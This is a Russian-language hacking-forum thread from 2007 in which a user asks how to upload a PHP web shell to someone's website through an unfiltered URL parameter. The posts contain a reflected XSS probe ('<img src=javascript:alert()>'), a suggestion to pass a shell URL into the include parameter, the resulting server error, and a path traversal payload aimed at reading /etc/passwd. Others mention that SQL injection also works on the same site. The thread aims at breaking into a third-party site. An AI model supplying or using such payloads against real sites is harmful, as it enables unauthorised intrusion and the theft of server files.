ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

Локальный Инклуд
  #1  
Старый 04.01.2007, 14:22
Аватар для NightRider
NightRider
Новичок
Регистрация: 03.01.2007
Сообщений: 4
Провел на форуме:
14301

Репутация: 0
Exclamation Локальный Инклуд

Здравствуйте!

Такая проблема.

Сайт не фильтрует символы в адресной строке браузера. Что ты туда вводишь ( к примеру, тег изображения ), то этот тег станет картинкой в теле страницы. Вот в чем вопрос.

Мне надо залить файл shell.php на тот хостинг, где стоит сайт!! Но как это сделать - не знаю!

При чем, если в адр. строку браузера вписать index.php?idn=<img src=javascript:alert()>, то выскочит окно!!

Хелп, плиз!!!
 

  #2  
Старый 04.01.2007, 14:35
Аватар для D=P=CH= MOD=
D=P=CH= MOD=
Постоянный
Регистрация: 15.08.2006
Сообщений: 404
Провел на форуме:
3811682

Репутация: 641
Отправить сообщение для D=P=CH= MOD= с помощью ICQ
По умолчанию

index.php?idn=[Адрес шелла]

некатит? 0_о
 

  #3  
Старый 04.01.2007, 14:45
Аватар для NightRider
NightRider
Новичок
Регистрация: 03.01.2007
Сообщений: 4
Провел на форуме:
14301

Репутация: 0
По умолчанию

Не получается. Пишет

Warning: main(categories/http://***.ru/shell.php.htm): failed to open stream: No such file or directory in /www/htdocs/index.php on line 440
 

  #4  
Старый 04.01.2007, 14:46
Аватар для NightRider
NightRider
Новичок
Регистрация: 03.01.2007
Сообщений: 4
Провел на форуме:
14301

Репутация: 0
По умолчанию

Нужно что-то с тегами!
 

  #5  
Старый 04.01.2007, 14:58
Аватар для max_pain89
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903

Репутация: 345


По умолчанию

толпаеп, это лок. инклуд насколько я понимаю... исчи статью Грин_бира про локальный инклуд
 

  #6  
Старый 04.01.2007, 15:10
Аватар для aka PSIH
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию

NightRider
Лучше дай ссылку на сайт посматреть, а то так не понятно что у тебя там, толи xss толи лок.инкдул... или вообще все вместе...
Попробуй /../../../../../../../etc/passwd%00 дописать
 

  #7  
Старый 04.01.2007, 15:13
Аватар для guest3297
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию

локальный инклуд...
 

  #8  
Старый 04.01.2007, 15:19
Аватар для NightRider
NightRider
Новичок
Регистрация: 03.01.2007
Сообщений: 4
Провел на форуме:
14301

Репутация: 0
По умолчанию

 

  #9  
Старый 04.01.2007, 15:26
Аватар для aka PSIH
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию

там только xss работает...
через лок.инклуд не чего не поимеешь
 

  #10  
Старый 04.01.2007, 16:05
Аватар для ice1k
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597

Репутация: 1866


Отправить сообщение для ice1k с помощью ICQ
По умолчанию

там кстати скуль вместе с инклудом О_о
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Инклуд в SAPID Version 1.2.0 _kREveDKo_ Уязвимости 0 24.06.2006 00:47
локальный взлом школьной операционной системы Windows Dracula4ever Авторские статьи 18 12.06.2006 19:20



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ